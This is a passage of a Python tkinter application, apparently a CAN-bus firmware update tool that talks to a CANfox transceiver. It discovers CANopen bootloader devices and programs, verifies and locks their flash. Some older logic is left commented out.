self.__reset_all_controls__(),\n                WorkingAction.wa_NONE: lambda: (self.__enable_controls_device__(), self.__enable_controls_programming__()),\n                WorkingAction.wa_PROGRAMMING: lambda: None,\n                WorkingAction.wa_VERIFYING: lambda: None,\n                WorkingAction.wa_DEVICE_READING: lambda: None,\n                WorkingAction.wa_ERROR: lambda: (self.__disable_controls_programming__(), self.__disable_controls_device__(), self.__enable_find_controls__()),\n                WorkingAction.wa_HARDWARE_ERROR: lambda: (self.__reset_all_controls__())\n            }[self.__workingAction]()\n        return\n    def __add_log_msg__(self, message):\n        self.flLstResults.insert(tk.END, \"[\" + datetime.datetime.now().strftime(\"%H:%M:%S\")+\"] \" + message)\n        self.flLstResults.yview(tk.END)\n        return\n\n\n    # Creation of init_window\n    def init_window(self):\n        defaultMainWindowSizeX = 600\n        defaultMainWindowSizeY = 400\n        # changing the title of our master widget\n        t = os.path.getmtime(os.path.realpath(__file__))\n        self.master.title(\"CAN Update Manager v1.002.\" + str(int(t))+\"b\")\n        self.master.minsize(100, 100)\n        self.master.geometry(str(defaultMainWindowSizeX) + \"x\" + str(defaultMainWindowSizeY))\n        self.master.bind(\"<Key>\", self.key)\n        #import settings\n\n        script_dir = os.path.dirname(__file__)  # <-- absolute dir the script is in\n        rel_path_settings = r\"settings.ini\"\n        abs_path_settings = os.path.join(script_dir, rel_path_settings)\n        self.settings = settings.Settings(abs_path_settings)\n        #MainMenu init\n        tkMainMenu = Menu(self.master)\n        self.master.config(menu=tkMainMenu)\n        tkMainManuMenuItemFile = Menu(tkMainMenu, tearoff=0)\n        tkMainMenu.add_cascade(label=\"File\", menu=tkMainManuMenuItemFile)\n        tkMainMenu.add_command(label=\"About\", command=lambda: CANLoaderAbout.MyDialog(self.master))\n        #tkMainManuMenuItemAbout = Menu(tkMainMenu, tearoff=0)\n        #tkMainManuMenuItemAbout.add_command(label=\"About program\", command=lambda: CANLoaderAbout.MyDialog(self.master))\n        tkMainManuMenuItemFile.add_command(label=\"Exit\", command=lambda: self.master.destroy())\n\n        #tkMainMenu.add_cascade(label=\"About\", menu=tkMainManuMenuItemAbout)\n        # allowing the widget to take the full space of the root window\n        self.grid_columnconfigure(0, weight=1)\n        self.grid_rowconfigure(0, weight=1)\n\n        #tabControlWidget\n        tabControl = ttk.Notebook(self)\n        tabProgramming = ttk.Frame(tabControl)\n        tabSettings = ttk.Frame(tabControl)\n        tabControl.add(tabProgramming, text=\"Programming\")\n        tabControl.add(tabSettings, text=\"Settings\")\n\n        tabControl.grid(row=0, column=0, sticky=tk.N + tk.S + tk.W + tk.E, padx=3, pady=3)\n        tabControl.rowconfigure(0, weight=1)\n        tabControl.columnconfigure(0, weight=1)\n        tabProgramming.columnconfigure(0, weight=1)\n        tabProgramming.rowconfigure(0, weight=1) #frameCanDevice\n        tabProgramming.rowconfigure(1, weight=1) #frameProgramming\n        tabProgramming.rowconfigure(2, weight=1) #frameLog\n        tabProgramming.rowconfigure(3, weight=1) #statusBar\n        # window positioning\n        xpos = self.master.winfo_screenwidth() / 2 - defaultMainWindowSizeX / 2\n        ypos = self.master.winfo_screenheight() / 2 - defaultMainWindowSizeY / 2\n        self.master.geometry(\"+%d+%d\" % (xpos, ypos))\n        # set icon\n        current_dir = os.path.dirname(os.path.realpath(__file__))\n        icon_path = os.path.join(current_dir, r'Images\\ico_canbus.ico')\n        if os.path.exists(icon_path) and os.path.isfile(icon_path):\n            self.master.iconbitmap(icon_path)\n        # frameCanDevice configuring\n        self.frameCanDevice = tk.LabelFrame(tabProgramming, relief=tk.RAISED, borderwidth=1, text=\"CAN Device\")\n        self.frameCanDevice.grid(row=0, column=0, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n        self.frameCanDevice.columnconfigure(0, weight=1, pad=3)\n        self.frameCanDevice.columnconfigure(1, weight=1, pad=3)\n        self.frameCanDevice.columnconfigure(2, weight=10, pad=3)\n        self.frameCanDevice.columnconfigure(3, weight=1, pad=3)\n        self.frameCanDevice.columnconfigure(4, weight=1, pad=3)\n        self.frameCanDevice.rowconfigure(0, weight=1, pad=3) #buttonFind and ListBox with found devices\n        self.frameCanDevice.rowconfigure(1, weight=1, pad=3) #frameFoundCanDevices\n\n        self.buttonCanConnect = tk.Button(self.frameCanDevice, wraplength=43, state=\"normal\", text=r\"CAN connect\", command=self.buttonCANConnectClick)\n        self.buttonCanConnect.grid(row=0, column=0, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n        self.buttonFind = tk.Button(self.frameCanDevice, wraplength=43, state=\"normal\", text=\"Read\", command=self.buttonFindClick)\n        self.buttonFind.grid(row=0, column=1, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n        self.frameFoundCanDevices = tk.LabelFrame(self.frameCanDevice, relief=tk.RAISED, borderwidth=1, text=\"Devices Found\")\n        self.frameFoundCanDevices.grid(row=0, column=2, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n        self.frameFoundCanDevices.columnconfigure(0, weight=1, pad=3)\n        self.frameFoundCanDevices.rowconfigure(0, weight=1, pad=3)\n        self.comboboxFoundCanDevices = ttk.Combobox(self.frameFoundCanDevices, values=[\n            \"\"], state=\"disable\")\n        self.comboboxFoundCanDevices.current(0)\n        self.comboboxFoundCanDevices.bind(\"<<ComboboxSelected>>\", self.comboboxFoundCanDevices_Selected)\n        self.comboboxFoundCanDevices.grid(row=0, column=0, sticky=tk.N + tk.S + tk.W + tk.E, padx=1, pady=1)\n        self.buttonLeaveBootloader = tk.Button(self.frameCanDevice, wraplength=43, state=\"normal\", text=\"Leave Boot\", command=self.buttonLeaveBootloaderClick)\n        self.buttonLeaveBootloader.grid(row=0, column=3, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n        self.buttonLock = tk.Button(self.frameCanDevice, wraplength=43, state=\"normal\", text=\"Lock\", command=self.buttonLockClick)\n        self.buttonLock.grid(row=0, column=4, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n\n        self.frameCanDeviceSelectedDevice = tk.LabelFrame(self.frameCanDevice, relief=tk.RAISED, borderwidth=1, text=\"Selected Device\")\n        self.frameCanDeviceSelectedDevice.grid(row=1, column=0, sticky=tk.N + tk.S + tk.W + tk.E, columnspan=5, padx=5, pady=5)\n        self.frameCanDeviceSelectedDevice.columnconfigure(0, weight=1, pad=3)\n        self.frameCanDeviceSelectedDevice.columnconfigure(1, weight=5, pad=3)\n        self.frameCanDeviceSelectedDevice.columnconfigure(2, weight=1, pad=3)\n        self.frameCanDeviceSelectedDevice.rowconfigure(0, weight=1, pad=3)\n        self.frameCanDeviceSelectedDevice.rowconfigure(1, weight=1, pad=3)\n        self.frameCanDeviceSelectedDevice.rowconfigure(2, weight=1, pad=3)\n        self.frameCanDeviceSelectedDevice.rowconfigure(3, weight=1, pad=3)\n        self.entryNodeIDText = tk.StringVar()\n        self.entryNodeID = tk.Entry(self.frameCanDeviceSelectedDevice, state=\"disabled\", textvariable=self.entryNodeIDText)\n        self.entryNodeID.grid(row=0, column=1, sticky=tk.N + tk.S + tk.W + tk.E, padx=3)\n        #self.flashFilePath = tk.StringVar()\n        #self.entryFlashFile = tk.Entry(self.frameProgramming, state=\"disabled\", textvariable=self.flashFilePath)\n        self.labelNodeID = tk.Label(self.frameCanDeviceSelectedDevice, text=\"Node ID:\")\n        self.labelNodeID.grid(row=0, column=0, sticky=tk.N + tk.S + tk.W + tk.E)\n        self.entryMCUInfoText = tk.StringVar()\n        self.entryMCUInfo = tk.Entry(self.frameCanDeviceSelectedDevice, 
state=\"disabled\", textvariable=self.entryMCUInfoText)\n self.entryMCUInfo.grid(row=1, column=1, sticky=tk.N + tk.S + tk.W + tk.E, padx=3)\n self.labelMCUInfo = tk.Label(self.frameCanDeviceSelectedDevice, text=\"MCU Info:\")\n self.labelMCUInfo.grid(row=1, column=0, sticky=tk.N + tk.S + tk.W + tk.E)\n self.labelStatus = tk.Label(self.frameCanDeviceSelectedDevice, text=\"None\")\n self.labelStatus.grid(row=0, column=2, sticky=tk.N + tk.S + tk.W + tk.E, rowspan=2)\n self.labelStatus.config(bg=\"gray\")\n\n #frameProgramming configuring\n self.frameProgramming = tk.LabelFrame(tabProgramming, relief=tk.RAISED, borderwidth=1, text=\"Flash programming\")\n self.frameProgramming.grid(row=1, column=0, sticky=tk.N + tk.S + tk.W + tk.E, padx=3, pady=3)\n self.frameProgramming.columnconfigure(0, weight=1, pad=3)\n self.frameProgramming.columnconfigure(1, weight=1, pad=3)\n self.frameProgramming.columnconfigure(2, weight=1, pad=3)\n self.frameProgramming.columnconfigure(3, weight=1, pad=3)\n self.frameProgramming.columnconfigure(4, weight=1, pad=3)\n self.frameProgramming.columnconfigure(5, weight=1, pad=3)\n self.frameProgramming.rowconfigure(0, weight=1, pad=3)\n self.frameProgramming.rowconfigure(1, weight=1, pad=3)\n\n #frameLog configuring\n self.frameLog = tk.LabelFrame(tabProgramming, relief=tk.RAISED, borderwidth=1, text=\"Log\")\n self.frameLog.grid(row=2, column=0, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n self.frameLog.columnconfigure(0, weight=20, pad=3)\n self.frameLog.columnconfigure(1, weight=1, pad=3)\n self.frameLog.rowconfigure(0, weight=1, pad=3)\n self.flLstResults = tk.Listbox(self.frameLog)\n self.flLstResults.config(height=5)\n self.flLstResults.grid(row=0, column=0, sticky=tk.N + tk.S + tk.W + tk.E)\n\n #statusBar configuring\n frameStatus = tk.Frame(tabProgramming, borderwidth=0)\n frameStatus.grid(row=3, column=0, sticky=tk.N + tk.S + tk.W + tk.E)\n frameStatus.columnconfigure(0, weight=1, pad=0)\n frameStatus.columnconfigure(1, weight=1, pad=0)\n frameStatus.rowconfigure(0, weight=1, pad=0)\n self.statusbarText = tk.StringVar()\n labelStatus = tk.Label(frameStatus, bd=1, relief=tk.SUNKEN, anchor=tk.W,\n textvariable=self.statusbarText)\n\n labelStatus.grid(row=0, column=0, sticky=tk.N + tk.S + tk.W + tk.E)\n s = ttk.Style()\n s.theme_use('alt')\n s.configure(\"red.Horizontal.TProgressbar\", foreground='red', background='green', padx=0, pady=0, pad=0)\n self.progressBar = ttk.Progressbar(frameStatus, mode=\"determinate\", style=\"red.Horizontal.TProgressbar\")\n self.progressBar.grid(row=0, column=1, sticky=tk.N + tk.S + tk.W + tk.E)\n self.progressBar['value'] = 0\n self.statusbarText.set('Started')\n\n labelInputFlash = tk.Label(self.frameProgramming, text=\"Input encoded .bin File\")\n labelInputFlash.grid(row=0, column=0, sticky=tk.N + tk.S + tk.W + tk.E)\n self.flashFilePath = tk.StringVar()\n self.entryFlashFile = tk.Entry(self.frameProgramming, state=\"disabled\", textvariable=self.flashFilePath)\n self.entryFlashFile.grid(row=0, column=1, sticky=tk.N + tk.S + tk.W + tk.E, columnspan=4)\n self.buttonSelectFlashFile = tk.Button(self.frameProgramming, state=\"disabled\", text=\"...\", command=self.buttonSelectFlashFileClick)\n self.buttonSelectFlashFile.grid(row=0, column=5, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n\n self.buttonProgramFlash = tk.Button(self.frameProgramming, state=\"disabled\", text=\"Program\", command=self.buttonProgramFlashClick)\n #self.buttonProgramFlash.config(state = \"disabled\")\n self.buttonProgramFlash.grid(row=1, 
column=0, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n        self.buttonVerifyFlash = tk.Button(self.frameProgramming, state=\"disabled\", text=\"Verify\", command=self.buttonVerifyFlashClick)\n        self.buttonVerifyFlash.grid(row=1, column=2, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n        self.buttonReadFlash = tk.Button(self.frameProgramming, state=\"disabled\", text=\"Read\", command=self.buttonReadFlashClick)\n        self.buttonReadFlash.grid(row=1, column=5, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n\n        self.flLstResultsScrollbar = tk.Scrollbar(self.frameLog, orient=tk.VERTICAL)\n        self.flLstResultsScrollbar.grid(row=0, column=1, sticky=tk.N + tk.S + tk.W + tk.E, pady=5)\n\n        self.flLstResults.config(yscrollcommand=self.flLstResultsScrollbar.set)\n        self.flLstResultsScrollbar.config(command=self.flLstResults.yview)\n\n        '''second tab - settings'''\n        tabSettings.rowconfigure(0, weight=1)\n        tabSettings.rowconfigure(1, weight=1)\n        tabSettings.rowconfigure(2, weight=1)\n        tabSettings.columnconfigure(0, weight=1)\n        #CAN settings frame\n        self.frameSettingsCAN = tk.LabelFrame(tabSettings, relief=tk.RAISED, borderwidth=1, text=\"CAN Settings\")\n        self.frameSettingsCAN.grid(row=0, column=0, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n        self.frameSettingsCAN.rowconfigure(0, weight=1)\n        self.frameSettingsCAN.columnconfigure(0, weight=1)\n        self.frameSettingsCAN.columnconfigure(1, weight=5)\n        labelCANSpeed = tk.Label(self.frameSettingsCAN, text=\"CAN Baudrate:\")\n        labelCANSpeed.grid(row=0, column=0, sticky=tk.N + tk.S + tk.W + tk.E)\n        self.comboboxCANSpeed = ttk.Combobox(self.frameSettingsCAN, values=self.settings.getDisplayValue(\"CANBaudrates\"), state=\"readonly\")\n        baudrate = self.settings.get(\"CAN\", \"BaudRate\")\n        if baudrate in self.comboboxCANSpeed['values']:\n            self.comboboxCANSpeed.current(self.comboboxCANSpeed['values'].index(baudrate))\n        else:\n            self.comboboxCANSpeed.current(0)\n        self.comboboxCANSpeed.bind(\"<<ComboboxSelected>>\", self.comboboxCANSpeed_Selected)\n        self.comboboxCANSpeed.grid(row=0, column=1, sticky=tk.N + tk.S + tk.W + tk.E, padx=1, pady=1)\n        #CANOpen settings frame\n        self.frameSettingsCANOpen = tk.LabelFrame(tabSettings, relief=tk.RAISED, borderwidth=1, text=\"CANOpen Settings\")\n        self.frameSettingsCANOpen.grid(row=1, column=0, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n        self.frameSettingsCANOpen.rowconfigure(0, weight=1)\n        self.frameSettingsCANOpen.columnconfigure(0, weight=1)\n        self.frameSettingsCANOpen.columnconfigure(1, weight=5)\n        labelCANOpenId = tk.Label(self.frameSettingsCANOpen, text=\"CANOpen ID:\")\n        labelCANOpenId.grid(row=0, column=0, sticky=tk.N + tk.S + tk.W + tk.E)\n\n        self.comboboxCANOpenSelfId = ttk.Combobox(self.frameSettingsCANOpen, state=\"readonly\", values = [c for c in range(1, 128)])\n        nodeId = self.settings.get(\"CANOpen\", \"NodeID\")\n        self.comboboxCANOpenSelfId.grid(row=0, column=1, sticky=tk.N + tk.S + tk.W + tk.E, padx=1, pady=1)\n        if nodeId in self.comboboxCANOpenSelfId['values']:\n            self.comboboxCANOpenSelfId.current(self.comboboxCANOpenSelfId['values'].index(nodeId))\n        else:\n            self.comboboxCANOpenSelfId.current(0)\n        self.comboboxCANOpenSelfId.bind(\"<<ComboboxSelected>>\", self.comboboxCANOpenSelfId_Selected)\n        self.labelNodeID = tk.Label(self.frameCanDeviceSelectedDevice, text=\"Node ID:\")\n        #Flash settings frame\n        self.frameSettingsFlash = tk.LabelFrame(tabSettings, relief=tk.RAISED, borderwidth=1, text=\"Flash Settings\")\n        self.frameSettingsFlash.grid(row=2, column=0, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n\n        self.pack(fill=tk.BOTH, 
expand=tk.YES)\n\n self.__disable_controls__(self.frameCanDevice)\n self.buttonCanConnect.config(state=\"normal\")\n\n self.__add_log_msg__(\"Started OK\")\n self.__add_log_msg__('Press \"' + self.buttonCanConnect['text'] + '\" button to connect to the CAN network')\n self.master.protocol(\"WM_DELETE_WINDOW\", self._delete_window)\n self.__workingAction = WorkingAction.wa_INIT\n self.__switch_controls__(te_OperationState.os_END)\n self.master.mainloop()\n # def buttonClick(self):\n # messagebox.showinfo(\"Say Hello\", \"Hello World\")\n\n def _delete_window(self):\n try:\n del self.canLoaderController\n except Exception:\n pass\n else:\n self.__add_log_msg__('Ok! Thank you. Goodbye!')\n self.master.destroy()\n\n def buttonCANConnectClick(self):\n self.__switch_controls__(te_OperationState.os_BEGIN)\n try:\n self.canLoaderController = CANLoaderController(self.settings)\n self.labelStatus['text'] = \"None\"\n self.labelStatus.config(bg=\"gray\")\n except CANfoxException as e:\n self.__workingAction = WorkingAction.wa_INIT\n self.__add_log_msg__(str(e))\n else:\n self.flLstResults.delete(0, tk.END)\n self.buttonCanConnect.configure(state='disable')\n self.buttonFind.configure(state='normal')\n self.__add_log_msg__('Successfully connected to CANfox transceiver. Press \"' + self.buttonFind['text'] + '\" button to discover devices')\n self.__workingAction = WorkingAction.wa_NONE\n self.__switch_controls__(te_OperationState.os_END)\n\n def buttonFindClick(self):\n self.sieca_lib = sieca132_client()\n\n l_netnumber = 105\n l_txtimeout = -1\n l_rxtimeout = -1\n\n c_canAppName = \"canAppName\"\n c_ReceiverEventName = \"RE1\"\n c_ErrorEventName = \"EE1\"\n\n d_retval = self.sieca_lib.canOpen(l_netnumber, 0, 0, l_txtimeout, l_rxtimeout, c_canAppName,\n c_ReceiverEventName, c_ErrorEventName)\n # self.flLstResults.insert(tk.END, CANTypeDefs.ReturnValues(d_retval[\"l_retval\"]), d_retval[\"handle\"])\n self.siecaLibHandle = d_retval[\"handle\"]\n # siecaDllInfo = CANTypeDefs.st_InternalDLLInformation()\n # res = self.sieca_lib.canGetDllInfo(ctypes.addressof(siecaDllInfo))\n self.flLstResults.insert(tk.END, \"sieca_lib: \" + str(self.sieca_lib))\n # self.flLstResults.insert(tk.END, CANTypeDefs.ReturnValues(res))\n # self.flLstResults.insert(tk.END, siecaDllInfo.aui_TxCounter)\n\n l_retval = self.sieca_lib.canSetBaudrate(self.siecaLibHandle,\n int(CANTypeDefs.Baudrate.BAUD_250)) # 250 kbits/sec\n self.flLstResults.insert(tk.END, \"Set Baudrate: \" + str(CANTypeDefs.ReturnValues(l_retval)))\n l_retval = self.sieca_lib.canBlinkLED(self.siecaLibHandle, 0, 0b111, 0b101)\n self.flLstResults.insert(tk.END, \"LED flashing settings applied: \" + str(CANTypeDefs.ReturnValues(l_retval)))\n l_retval = self.sieca_lib.canIsNetOwner(d_retval[\"handle\"])\n self.flLstResults.insert(tk.END, \"CanIsNetOwner: \" + str(CANTypeDefs.ReturnValues(l_retval)))\n\n l_retval = self.sieca_lib.canSetFilterMode(self.siecaLibHandle, CANTypeDefs.T_FILTER_MODE.filterMode_nofilter)\n self.flLstResults.insert(tk.END, \"CanSetFilterMode: \" + str(CANTypeDefs.ReturnValues(l_retval)))\n message_reader = ThreadCANMsgReader(self.siecaLibHandle, self.sieca_lib, self.QueueIncomingMessages)\n message_reader.start()\n\n # d_retval = self.sieca_lib.canRead(self.siecaLibHandle)\n # self.flLstResults.insert(tk.END, \"DataCount: \" + str(d_retval[\"l_len\"]))\n # self.flLstResults.insert(tk.END, \"DataCount: \" + str(CANTypeDefs.ReturnValues(d_retval[\"l_retval\"])))\n\n '''d_retval = self.sieca_lib.canRead(self.canfox_handle)\n for item in range(0, 
d_retval[\"l_len\"].value):\n self.queue.put(d_retval[\"canmsg\"][item])'''\n self.check_my_msg()\n '''i = 0\n while i < 10:\n d_retval = self.sieca_lib.canRead(self.siecaLibHandle)\n\n\n for item in range(0, d_retval[\"l_len\"].value):\n msg1 = d_retval[\"canmsg\"][item]\n #msg2 = d_retval[\"canmsg\"][0]\n s_data = \"\"\n #s_data = msg1.aby_data\n for y in range(0, msg1.by_len):\n s_data += str(hex(msg1.aby_data[y])) + \" \"\n self.__add_log_msg__(\"[\" + str(hex(msg1.l_id)) + \"] Data = \" + s_data + \"; Len = \" + str(msg1.by_len) + \"; Ext: \" + str(msg1.by_extended) + \";\")\n i += 1'''\n\n #self.process_queue()\n\n return\n '''for y in range(0, msg.by_len):\n s_data += \"[\" + str(y) + \"] = \" + str(hex(msg.aby_data[y])) + \"; \"\n self.flLstResults.insert(tk.END, \"l_id: \" + str(hex(msg.l_id)) + \" by_len: \" + str(\n msg.by_len) + \" by_msg_lost: \" + str(msg.by_msg_lost) +\n \" by_extended: \" + str(msg.by_extended) + \" by_remote: \" + str(\n msg.by_remote) + \" ul_tstamp: \" + str(msg.ul_tstamp) + \" Data = \" + s_data)'''\n\n \"\"\"\n self.CurrentDeviceBootloaderState = te_CurrentDeviceBootloaderState.bs_Unknown\n self.buttonFind.configure(state='disable')\n self.flLstResults.delete(0, tk.END)\n self.__add_log_msg__('CANLoader devices searching...')\n try:\n nodes = self.canLoaderController.discover_connected_devices()\n except CANfoxHardwareException as e:\n self.__add_log_msg__(\"Hardware error: \" + str(e))\n self.__switch_controls__(te_OperationState.os_END)\n self.__workingAction = WorkingAction.wa_HARDWARE_ERROR\n self.StatusBarUpdaterFunction()\n return\n except Exception as e:\n self.__add_log_msg__(\"Software error: \" + str(e))\n self.__switch_controls__(te_OperationState.os_END)\n self.__workingAction = WorkingAction.wa_ERROR\n self.StatusBarUpdaterFunction()\n return\n nodes.sort()\n nodes_text = \"CAN IDs': \"\n nodes_delimeter = \"\"\n for node_id in nodes:\n nodes_text = nodes_text + nodes_delimeter + ' {}'.format(str(node_id))\n nodes_delimeter = \",\"\n if len(nodes) != 0:\n self.__add_log_msg__(\"Found {} CAN devices(s): {}\".format(len(nodes), nodes_text))\n else:\n self.__add_log_msg__(\"Any CANopen devices on CAN bus not found\")\n try:\n self.reprogrammable_devices = self.canLoaderController.find_reprogrammable_devices()\n except CANfoxHardwareException as e:\n self.__add_log_msg__(\"Hardware error: \" + str(e))\n self.__workingAction = WorkingAction.wa_HARDWARE_ERROR\n self.__switch_controls__(te_OperationState.os_END)\n self.StatusBarUpdaterFunction()\n return\n except Exception as e:\n self.__add_log_msg__(\"Software error: \" + str(e))\n self.__workingAction = WorkingAction.wa_ERROR\n self.__switch_controls__(te_OperationState.os_END)\n self.StatusBarUpdaterFunction()\n return\n\n if len(self.reprogrammable_devices) != 0:\n self.__add_log_msg__(\"Found {} CANOpen bootloader devices(s): \".format(len(self.reprogrammable_devices)))\n items = list()\n for iterator, node in self.reprogrammable_devices.items():\n programmable_nodes_text = \"CANOpen ID: {}\".format(node.id)\n items.append(\n \"NodeID: {}, Name(1008/0): {}\".format(node.id, node._bag_['Manufacturer device name (0x1008_0)']))\n\n for node_param_desc, node_param_value in node._bag_.items():\n programmable_nodes_text += \";{}={}\".format(node_param_desc, node_param_value)\n self.__add_log_msg__(programmable_nodes_text)\n self.comboboxFoundCanDevices['values'] = items\n self.comboboxFoundCanDevices.current(0)\n\n self.entryNodeIDText.set('{}'.format(self.reprogrammable_devices[0].id))\n 
self.entryMCUInfoText.set('{}'.format(self.reprogrammable_devices[0]._bag_['Manufacturer device name (0x1008_0)']))\n self.labelStatus['text'] = \"Ready\"\n self.labelStatus.config(bg=\"green\")\n else:\n self.__disable_controls__(self.frameCanDeviceSelectedDevice)\n self.__workingAction = WorkingAction.wa_NONE\n self.__switch_controls__(te_OperationState.os_END)\n self.buttonFind.configure(state='normal')\n return\"\"\"\n\n def check_my_msg(self):\n d_retval = self.sieca_lib.canRead(self.siecaLibHandle)\n\n for item in range(0, d_retval[\"l_len\"].value):\n msg1 = d_retval[\"canmsg\"][item]\n # msg2 = d_retval[\"canmsg\"][0]\n s_data = \"\"\n # s_data = msg1.aby_data\n for y in range(0, msg1.by_len):\n s_data += str(hex(msg1.aby_data[y])) + \" \"\n self.__add_log_msg__(\n \"[\" + str(hex(msg1.l_id)) + \"] Data = \" + s_data + \"; Len = \" + str(msg1.by_len) + \"; Ext: \" + str(\n msg1.by_extended) + \";\")\n self.master.after(100, self.check_my_msg)\n\n def buttonLeaveBootloaderClick(self):\n self.__workingAction = WorkingAction.wa_NONE\n self.__switch_controls__(te_OperationState.os_BEGIN)\n current_device = self.comboboxFoundCanDevices.current()\n try:\n self.canLoaderController.mcu_leave_bootloader(current_device)\n except CANLoaderDeviceFailureException as e:\n self.__add_log_msg__(\"Error: \" + str(e))\n self.__workingAction = WorkingAction.wa_HARDWARE_ERROR\n except Exception as e:\n self.__add_log_msg__(\"Error: \" + str(e))\n self.__workingAction = WorkingAction.wa_ERROR\n else:\n self.CurrentDeviceBootloaderState = te_CurrentDeviceBootloaderState.bs_Unknown\n self.__add_log_msg__(\"Left bootloader\")\n self.StatusBarUpdaterFunction()\n self.__switch_controls__(te_OperationState.os_END)\n return\n\n def process_queue(self):\n try:\n while self.QueueIncomingMessages.qsize() > 0:\n #time.sleep(0.1)\n msg = self.QueueIncomingMessages.get(0)\n d_retval = self.sieca_lib.canRead(self.siecaLibHandle)\n s_data = d_retval[\"canmsg\"]\n self.__add_log_msg__(\"Data = \" + str(s_data))\n '''self.flLstResults.insert(tk.END, \"l_id: \" + str(hex(msg.l_id)) + \" by_len: \" + str(\n msg.by_len) + \" by_msg_lost: \" + str(msg.by_msg_lost) +\n \" by_extended: \" + str(msg.by_extended) + \" by_remote: \" + str(\n msg.by_remote) + \" ul_tstamp: \" + str(msg.ul_tstamp) + \" Data = \" + s_data)'''\n #self.flLstResults.select_clear(self.flLstResults.size() - 2) # Clear the current selected item\n #self.flLstResults.select_set(tk.END) # Select the new item\n if self.flLstResults.size() > 100:\n self.flLstResults.delete(0)\n self.flLstResults.yview(tk.END) # Set the scrollbar to the end of the listbox\n except queue.Empty:\n pass #no data\n #self.master.after(100, self.process_queue)\n\n def buttonLockClick(self):\n current_device = self.comboboxFoundCanDevices.current()\n self.__workingAction = WorkingAction.wa_NONE\n self.__switch_controls__(te_OperationState.os_BEGIN)\n try:\n self.canLoaderController.move_mcu_to_bootloader(current_device)\n self.canLoaderController.mcu_lock(current_device)\n except CANLoaderDeviceFailureException as e:\n self.__add_log_msg__(\"Error: \" + str(e))\n self.__workingAction = WorkingAction.wa_HARDWARE_ERROR\n except Exception as e:\n self.__add_log_msg__(\"Error: \" + str(e))\n self.__workingAction = WorkingAction.wa_ERROR\n else:\n self.__add_log_msg__(\"Device locked\")\n self.__workingAction = WorkingAction.wa_NONE\n self.StatusBarUpdaterFunction()\n self.__switch_controls__(te_OperationState.os_END)\n return\n\n def buttonSelectFlashFileClick(self):\n filename = 
filedialog.askopenfilename(initialdir=\"/\", title=\"Select file\",\n                                               filetypes=((\"Encoded bin file\", \"*.bin\"), (\"All files\", \"*.*\")))\n        if filename:\n            self.__add_log_msg__(\"You have selected file: \" + filename)\n            try:\n                filesize = os.path.getsize(filename)\n                if os.path.exists(filename) and filesize > 0 and (filesize % 8 == 0):\n                    self.flashFilePath.set(filename)\n                else:\n                    raise Exception('File does not exist, is empty, or is corrupted.')\n                if len(self.reprogrammable_devices) > 0:\n                    self.__enable_controls_programming__()\n            except Exception as e:\n                self.__add_log_msg__(\"Error opening file: \" + str(e))\n        else:\n            pass\n\n    def FirmwareVerifierFunction(self):\n        try:\n            current_device = self.comboboxFoundCanDevices.current()\n            self.canLoaderController.move_mcu_to_bootloader(current_device)\n            # drain any stale service messages (queue.Queue.empty() only reports state)\n            while not self.QueueThreadVerifyingService.empty():\n                self.QueueThreadVerifyingService.get_nowait()\n            self.CurrentDeviceBootloaderState = te_CurrentDeviceBootloaderState.bs_InBootloader\n            self.canLoaderController.verify_firmware_file(current_device, self.flashFilePath, self.QueueProgressBar,\n                                                           self.QueueThreadVerifyingService)\n            self.__workingAction = WorkingAction.wa_NONE\n            self.__add_log_msg__(\"Verifying completed successfully\")\n        except CANLoaderFirmwareVerifyException as e:\n            self.__add_log_msg__(\"Verify error: \" + str(e))\n            self.__workingAction = WorkingAction.wa_ERROR\n        except CANfoxHardwareException as e:\n            self.__add_log_msg__(\"Hardware error: \" + str(e))\n            self.__workingAction = WorkingAction.wa_HARDWARE_ERROR\n        except Exception as e:\n            self.__add_log_msg__(\"Error: \" + str(e))\n            self.__workingAction = WorkingAction.wa_ERROR\n        else:\n            self.__workingAction = WorkingAction.wa_NONE\n        return\n\n    def buttonVerifyFlashClick(self):\n        self.__workingAction = WorkingAction.wa_VERIFYING\n        self.__switch_controls__(te_OperationState.os_BEGIN)\n\n        self.__add_log_msg__(\"Verifying target...\")\n        Thread(target=self.FirmwareVerifierFunction).start()\n        self.master.after(250, self.StatusBarUpdaterFunction)\n        self.labelStatus['text'] = \"Verifying\"\n        self.labelStatus.config(bg=\"yellow\")\n\n    def FirmwareProgrammerFunction(self):\n        try:\n            current_device = self.comboboxFoundCanDevices.current()\n            self.canLoaderController.move_mcu_to_bootloader(current_device)\n            self.CurrentDeviceBootloaderState = te_CurrentDeviceBootloaderState.bs_InBootloader\n            # drain any stale service messages (queue.Queue.empty() only reports state)\n            while not self.QueueThreadProgrammingService.empty():\n                self.QueueThreadProgrammingService.get_nowait()\n            #0. Check Read/Write protection state of MCU. It's important - read_level2 and WrPr blocks are not accessible for these types of operations\n            self.canLoaderController.reset_lock_state(current_device)\n            self.__add_log_msg__(\"Device unlocked.\")\n            self.__add_log_msg__(\"Programming target...\")\n            self.canLoaderController.upload_firmware_file(current_device, self.flashFilePath, self.QueueProgressBar,\n                                                           self.QueueThreadProgrammingService)\n            self.__workingAction = WorkingAction.wa_NONE\n            self.__add_log_msg__(\"Programming completed successfully\")\n        except CANLoaderFirmwareVerifyException as e:\n            self.__add_log_msg__(\"CRC32 error: \" + str(e))\n            self.__workingAction = WorkingAction.wa_ERROR\n        except CANfoxHardwareException as e:\n            self.__add_log_msg__(\"Hardware error: \" + str(e))\n            self.__workingAction = WorkingAction.wa_HARDWARE_ERROR\n        except Exception as e:\n            self.__add_log_msg__(\"Programming error: \" + str(e))\n            self.__workingAction = WorkingAction.wa_ERROR\n        else:\n            self.__workingAction = WorkingAction.wa_NONE\n        return\n\n    def StatusBarUpdaterFunction(self):\n        try:\n            while 